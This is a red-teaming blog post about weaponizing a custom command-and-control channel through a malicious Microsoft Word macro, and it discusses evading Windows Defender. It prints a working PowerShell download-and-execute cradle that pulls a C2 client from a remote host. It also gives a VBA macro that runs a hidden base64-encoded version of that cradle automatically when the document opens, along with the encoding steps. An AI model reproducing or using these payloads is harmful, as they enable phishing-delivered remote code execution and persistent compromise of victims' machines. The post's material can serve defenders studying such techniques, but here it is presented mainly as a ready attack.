Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro
Welcome back my fellow hackers, today we are continuing the series of showcasing Red Teaming TTPs by trying to weaponize a custom C2 channel we previously written. If you want to find the video about making the C2 you can find it here: https://youtu.be/Yoj0bQkIRqU
I also wrote a blogpost which can be found here: Creating Reverse C2 Channel with C# Powershell and Python | by Lsec | May, 2022 | Medium
And the video alternative for this blogpost can be found here on my YouTube Channel: https://youtu.be/pGRGxx2AO3A
Enough links, let’s get into action!
Slowly building UP
I assume that you already read about the technology and the idea behind our custom C2, now we are taking the steps further. My idea is to embed it into a word document, as a malicious macro. This can be done in several ways and we failed to evade Windows Defender with the classical approach.
First, lets test it to see the payload in action.
By remotely loading the client.ps1 file, we were able to successfully trigger the callback on both Commando VM, and a Windows 10 box with Defender turned to on.
The payload to load the client.ps1 file I used was:
powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.126.128/client.ps1')"
Why is this not getting caught?
The reason why the raw payload is not getting caught is because Windows Defender think that we are just developing standard C# code. Lets get into a little bit more theory.
The whole body of client.ps1 is a giant variable with a C# code. This code itself is not considered malicious since it executes local command passed from a local variable WHICH is generated from remote callback. If you were to develop C# project to execute a command the Defender won’t trigger since genuinely this is not a malicious activity. On the other hand we are abusing it in a malicious way so we can call whatever command we want remotely, to create a session with the timespan of the executed command. The Defender is mainly concerned about different shellcodes or exes with known signatures. Keep in mind that following this technique we are NOT operating completely from memory. Temporary files are being created whenever the C# code is compiled and executed, but this is enough to bypass the Defender since it thinks we are just developing a C# program.
Weaponization Part.
Now let’s talk about it’s weaponization. The idea is to embed it into a word macro. Following the classical approach my syntax was:
Sub BonusMacro()Shell ("powershell -exec bypass -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxADIANgAuADEAMgA4AC8AYwBsAGkAZQBuAHQALgBwAHMAMQAnACkA")End SubSub AutoOpen()BonusMacroEnd SubSub Document_Open()BonusMacroEnd Sub
Let’s break it down.
The main macro function is BonusMacro. It does only one thing and it is to execute powershell base64 script in the background (-w hidden). This way even if the Word document is closed, our powershell process persists. Also no visual effect is presented to the end user, which reduces the chances of getting caught.
Why Base64? Because that way we can evade syntax errors.
To Base64 a command I followed this example:
$cmd= "IEX(New-Object Net.WebClient).DownloadString('http://192.168.126.128/client.ps1')"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedTextThen we have two other macro functions for auto opening the macro whenever the document is being opened (and clicked enable content of course).
What happened?
By following the classical approach Windows Defender successfully caught our malicious Word document. Let’s try to understand why.
By my opinion (and testing), each time Defender sees “Shell(powershell)” inside any macro function, it automatically flags it as a malicious one. Keep in mind that our raw payload worked perfectly, so we must find a way to better weaponize our C2.
What now?
From here on, we have a lot of options to obfuscate our payload, or we can use different approaches to make it work.
What is the moral of the story?
Nowadays the technologies are advanced and the classical attack methods no longer works. To bypass AV, we must think outside of the box and try something new. Testing is the key. A lot of think is required but each theory should be backed up by a lot of testing exercises.
In the next video (and blogpost) I will showcase how to bypass Defender following the same attack method (MS Word Macro, client side attack). Stay tuned to my channel and happy hacking.
DISCLAIMER: I AM NOT RESPONSIBLE FOR THE ACTIONS YOU TAKE WITH THE CUSTOM MADE C2 CHANNEL!!!
